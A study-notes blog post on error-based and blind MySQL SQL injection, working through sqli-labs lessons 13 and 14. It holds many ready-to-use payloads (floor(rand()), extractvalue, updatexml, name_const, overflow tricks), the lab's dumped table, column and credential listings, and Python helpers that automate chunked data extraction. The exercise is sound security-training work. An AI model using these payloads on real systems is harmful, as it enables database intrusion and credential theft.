I worked through sqli-labs once before; this pass is a review to consolidate it, with every payload typed out by hand to reinforce memory.
Sqli-labs blog series index
Functions used in blind injection
rand(): without an argument it returns a non-repeatable random float in [0,1); with an integer argument the output becomes a fixed pseudo-random sequence.
rand(0), rand(1): when an integer argument is given, rand uses it as the seed and generates a fixed (repeatable) pseudo-random sequence, so every evaluation sees the same values in the same order.
floor(): round down, floor(2.5) == 2
count(): count the number of rows (tuples)
concat(): string concatenation, concat('~~','aaa','bbb') => '~~aaabbb' (all arguments are simply joined in order)
concat_ws(): concatenation with a separator, concat_ws('~~','aaa','bbb') => 'aaa~~bbb' (the first argument is the separator)
extractvalue() (the error echoes at most 32 characters): MySQL 5.1.5 added functions for querying and modifying XML documents, ExtractValue() and UpdateXML(); an invalid XPath expression makes them raise an error that echoes the offending string, which is what leaks the data.
updatexml() (the error echoes at most 32 characters)
name_const(): local variables in MySQL stored procedures are wrapped by an internal function name_const; it seems to be designed specifically for stored procedures and nothing else special is mentioned about it.
Less-13: error-based injection with name_const()
Less-14: error-based injection with extractvalue()
Boolean-based blind injection: brute-force the result one character at a time
?id=1' and left((select version() limit 0,1),1)='s'#
Error-based injection via the floor(rand(x)*2) GROUP BY bug: the group key is evaluated once to look the group up and again when a new group is inserted, so a seeded rand() can produce a key that already exists and MySQL raises "Duplicate entry"; the driving table needs at least three rows for this to trigger
?id=1" union select 1,count(*),concat((your query),floor(rand(0)*2))a from information_schema.columns group by a#
?id=1" and (select 1 from(select count(*),concat((your query),floor(rand(0)*2))x from information_schema.tables group by x)a)#
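To make the floor(rand(0)*2) mechanism concrete, here is an added example (not part of the original post) that reimplements MySQL's seeded RAND() in Python (the seeding constants 0x10001, 55555555 and 0x10000001 and the my_rnd step are MySQL's; the class and function names are this example's own) and then simulates the temp-table GROUP BY, evaluating the key once for the lookup and again on insert, to show why the query errors out exactly at the third row of the driving table.

```python
# Added example, not code from the original post.
# Reproduces the floor(rand(0)*2) sequence and simulates the double evaluation
# of the GROUP BY key that turns it into a "Duplicate entry" error.

MAX_VALUE = 0x3FFFFFFF  # rand_struct.max_value in MySQL


class MySQLRand:
    """Seeded RAND(n): same seed -> same sequence, as in MySQL."""

    def __init__(self, seed: int):
        # Item_func_rand::seed_random -> randominit(rand, n*0x10001+55555555, n*0x10000001)
        seed1 = (seed * 0x10001 + 55555555) & 0xFFFFFFFF
        seed2 = (seed * 0x10000001) & 0xFFFFFFFF
        self.seed1 = seed1 % MAX_VALUE
        self.seed2 = seed2 % MAX_VALUE

    def next(self) -> float:
        # my_rnd(): one linear congruential step
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_times_2(seed: int, n: int) -> list:
    """The first n values of floor(rand(seed)*2)."""
    r = MySQLRand(seed)
    return [int(r.next() * 2) for _ in range(n)]


class DuplicateEntry(Exception):
    """Stands in for MySQL's 'Duplicate entry ... for key group_key' error."""


def simulate_group_by(seed: int, rows: int) -> dict:
    """Model of the temp-table GROUP BY (this example's own simplification):
    the key expression is evaluated once to look the group up and, if the
    group is new, evaluated again when the row is inserted. Returns the
    finished temp table (key -> count) or raises DuplicateEntry naming the
    1-based row at which MySQL would fail."""
    r = MySQLRand(seed)
    table = {}
    for row in range(1, rows + 1):
        key = int(r.next() * 2)          # evaluation 1: lookup
        if key in table:
            table[key] += 1
            continue
        key = int(r.next() * 2)          # evaluation 2: insert (rand() runs again)
        if key in table:
            raise DuplicateEntry(f"row {row}: Duplicate entry '{key}' for key 'group_key'")
        table[key] = 1
    return table


def rows_needed_to_error(seed: int, max_rows: int = 50) -> int:
    """Smallest driving-table size at which the injection errors (0 if it never does)."""
    for n in range(1, max_rows + 1):
        try:
            simulate_group_by(seed, n)
        except DuplicateEntry:
            return n
    return 0


if __name__ == "__main__":
    print(floor_rand_times_2(0, 6))   # [0, 1, 1, 0, 1, 1]
    print(rows_needed_to_error(0))    # 3
```

With seed 0 the sequence starts 0, 1, 1, 0, 1, 1: row 1 looks up key 0, does not find it and inserts with the re-evaluated key 1; row 2 looks up key 1 and finds it; row 3 looks up key 0, misses, and tries to insert with key 1, which already exists. That is why information_schema.tables or .columns (always more than three rows) is used as the driving table, and why a seed whose sequence stays constant, such as rand(14), never errors.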
Error-based injection with extractvalue() (length limit: the error echoes at most 32 characters, so longer values have to be read in pieces with substr()/mid(); not available on MySQL 5.0, available on MySQL 5.6)
?id=1" and extractvalue(1,concat(0x7e,(your query)))#
?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((your query))x from information_schema.tables group by x)a))))#
?id=1" and extractvalue(1,concat(0x7e,(database())))#
?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((select username from security.users limit 0,1))x from information_schema.tables group by x)a))))#
Error-based injection with updatexml() (same limit: the error echoes at most 32 characters)
?id=1" and updatexml(1,concat(0x7e,(your query),0x7e),1)#
Error-based injection using the duplicate column names produced by name_const() (old versions only: works on MySQL 5.0, not on MySQL 5.6)
?id=1" union select 1,2,3 from (select name_const((your query),1),name_const((your query),1))x #
?id=1" and exists(select * from (select * from(select name_const((your query),0))a join(select name_const((your query),0))b)c)#
Error-based injection via a DOUBLE value going out of range (~ applied to the subquery's string result yields 18446744073709551615, and exp() of that exceeds the DOUBLE range, so the error message quotes the expression together with the subquery result)
?id=1" union select (exp(~(select * from(select user())a))),2,3#
Not tested successfully
Error-based injection via BIGINT overflow (these overflow errors are only raised on MySQL 5.5.5 and above; !(subquery) is 0 or 1, and subtracting ~0, the largest BIGINT UNSIGNED, from it goes out of range)
SQL injection based on BIGINT overflow errors ( https://www.cnblogs.com/lcamry/articles/5509112.html )
Not tested successfully
?id=1" union select (!(select * from (select user())x) - ~0),2,3#
The patterns:
!(select*from(select user())x)-~0
(select(!x-~0)from(select(select user())x)a)
(select!x-~0.from(select(select user())x)a)
select ~0+!(select*from(select user())x)
A composable pattern:
(select * from(select concat((your query))x from information_schema.tables group by x)a)
When a plain select * from ... cannot be used directly, this general-purpose wrapper can take the place of "(your query)" in the payloads below
?id=1" and (select 1 from(select count(*),concat((your query),floor(rand(0)*2))x from information_schema.tables group by x)a)#
?id=1" and extractvalue(1,concat(0x7e,(your query)))#
?id=1" and updatexml(1,concat(0x7e,(your query),0x7e),1)#
?id=1" and exists(select * from (select * from(select name_const((your query),0))a join(select name_const((your query),0))b)c)#
?id=1" union select 1,2,3 from (select name_const((your query),1),name_const((your query),1))x #
?id=1" union select (exp(~(select * from(select user())a))),2,3#
and so on...
Test (Less-13, name_const)
Old versions only: works on MySQL 5.0, not on MySQL 5.6
Enter 1') order by 2# in username // no output
Enter anything in password
Enter 1') order by 3# in username // error
Enter anything in password
?id=1" union select 1,2,3 from (select name_const((your query),1),name_const((your query),1))x #
?id=1" and exists(select * from (select * from(select name_const((your query),0))a join(select name_const((your query),0))b)c)#
Guess the database
1') union select 1,2 from (select name_const((select version() limit 0,1),1),name_const((select version() limit 0,1),1))x#
1') union select 1,2 from (select name_const((select table_schema from information_schema.tables limit 0,1),1),name_const((select table_schema from information_schema.tables limit 0,1),1))x #
1') and exists(select * from (select * from(select name_const((select table_schema from information_schema.tables limit 0,1),1))a join(select name_const((select table_schema from information_schema.tables limit 0,1),1))b)c)#
Result: security
Guess the table names
1') union select 1,2,3 from (select name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1),name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))x#
1') union select 1,2,3 from (select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema='security'),1),name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema='security'),1))x#
1') and exists(select * from (select * from(select name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))a join(select name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))b)c)#
1') and exists(select * from (select * from(select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema='security'),1))a join(select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema='security'),1))b)c)#
Result: emails ,referers ,uagents ,users
Guess the column names
1') union select 1,2,3 from (select name_const((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1),name_const((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1))x#
1') union select 1,2,3 from (select name_const((select group_concat(column_name,0x20) from information_schema.columns where table_name='users' and table_schema='security'),1),name_const((select group_concat(column_name,0x20) from information_schema.columns where table_name='users' and table_schema='security'),1))x#
1') and exists(select * from (select * from(select name_const((select group_concat(column_name,0x20) from information_schema.columns where table_name='users' and table_schema='security'),1))a join(select name_const((select group_concat(column_name,0x20) from information_schema.columns where table_name='users' and table_schema='security'),1))b)c)#
1') and exists(select * from (select * from(select name_const((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1))a join(select name_const((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1))b)c)#
Result: id ,username ,password
Guess the data
1') union select 1,2,3 from (select name_const((select group_concat(username,0x20) from security.users),1),name_const((select group_concat(username,0x20) from security.users),1))x#
1') and exists(select * from (select * from(select name_const((select group_concat(password,0x20) from security.users),1))a join(select name_const((select group_concat(password,0x20) from security.users),1))b)c)#
Results:
username: Dumb ,Angelina ,Dummy ,secure ,stupid ,superman ,batman ,admin ,
password: Dumb ,I-kill-you ,p@ssword ,crappy ,stupidity ,genious ,mobile ,
Test (Less-14, extractvalue)
Length limit: the error echoes at most 32 characters; not usable on MySQL 5.0, usable on MySQL 5.6
Enter 1" order by 2# in username
Enter 1" order by 3# in username
Enter anything in password
1" and extractvalue(1,concat(0x7e,(your query)))#
Guess the database
1" and extractvalue(1,concat(0x7e,(database())))#
1" and extractvalue(1,concat(0x7e,(select table_schema from information_schema.tables limit 0,1)))#
Result: security
Guess the table names
1" and extractvalue(1,concat(0x7e,(select group_concat(table_name,0x20) from information_schema.tables where table_schema='security')))#
Result: emails ,referers ,uagents ,user (the end of "users" is cut off: with the leading ~ the echoed string exceeds 32 characters, so the tail is lost)
Guess the column names
1" and extractvalue(1,concat(0x7e,(select group_concat(column_name,0x20) from information_schema.columns where table_name='users' and table_schema='security')))#
Result: id ,username ,password
Guess the data
1" and extractvalue(1,concat(0x7e,(select group_concat(username) from security.users)))#
1" and extractvalue(1,concat(0x7e,(select group_concat(password) from security.users)))#
Results (truncated by the 32-character limit on the echoed string; the rest has to be read with substr()/mid() and a moving offset)
username:Dumb,Angelina,Dummy,secure,stup
password:Dumb,I-kill-you,p@ssword,crappy
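The truncated results above, and the 32-character note in the extractvalue()/updatexml() sections, are the practical problem with this technique: the XPATH error only echoes 32 characters, and one of them is the ~ marker. The following is an added example (not from the original post) that builds substr()-chunked extractvalue() payloads and reassembles the pieces from the error text. The fake_mysql_error() function is a constructed stand-in for the server that mimics the 32-character truncation on the usernames listed in the post; in a real test you would replace it with a function that submits the payload in the username field and returns the page's error text.

```python
# Added example, not code from the original post.
# Reads a value longer than 32 characters through extractvalue() by sliding a
# substr() window over it and gluing the echoed chunks back together.
import re

# The injected expression is:
#   and extractvalue(1,concat(0x7e,substr((<query>),<start>,<len>)))#
# 0x7e is '~'; it makes the XPath invalid, so the error echoes what follows it.
ERROR_ECHO_LIMIT = 32          # characters of the XPath string MySQL shows in the error
CHUNK = ERROR_ECHO_LIMIT - 1   # one slot is taken by the leading '~'


def extractvalue_payload(query: str, start: int, length: int = CHUNK) -> str:
    """Payload for characters start .. start+length-1 (substr() is 1-based)."""
    return f"and extractvalue(1,concat(0x7e,substr(({query}),{start},{length})))#"


# Constructed stand-in for security.users: the usernames listed in the post.
FAKE_USERNAMES = "Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin"


def fake_mysql_error(payload: str) -> str:
    """Emulate the server: evaluate substr() on the fake data, then return the
    'XPATH syntax error' text, which echoes at most 32 characters of the XPath."""
    m = re.search(r"substr\(\(.*?\),(\d+),(\d+)\)", payload)
    start, length = int(m.group(1)), int(m.group(2))
    xpath = "~" + FAKE_USERNAMES[start - 1:start - 1 + length]
    return f"XPATH syntax error: '{xpath[:ERROR_ECHO_LIMIT]}'"


def parse_echo(error_text: str) -> str:
    """Pull the echoed string out of the error and drop the '~' marker."""
    m = re.search(r"XPATH syntax error: '~(.*)'", error_text)
    return m.group(1) if m else ""


def dump_long_value(query: str, send) -> str:
    """Read a value of any length, one 31-character window at a time.
    `send` delivers a payload and returns the server's error text."""
    out, start = "", 1
    while True:
        piece = parse_echo(send(extractvalue_payload(query, start)))
        out += piece
        if len(piece) < CHUNK:      # a short (or empty) chunk means we hit the end
            return out
        start += CHUNK


if __name__ == "__main__":
    q = "select group_concat(username) from security.users"
    print(dump_long_value(q, fake_mysql_error))
```

The first window returns exactly the string the post got with the unchunked payload (Dumb,Angelina,Dummy,secure,stup), and the second window, starting at offset 32, returns the remainder; a chunk shorter than 31 characters (or an empty one, when the offset is past the end) signals that the whole value has been read. The same loop works unchanged for updatexml(), since it raises the same XPATH error with the same 32-character echo.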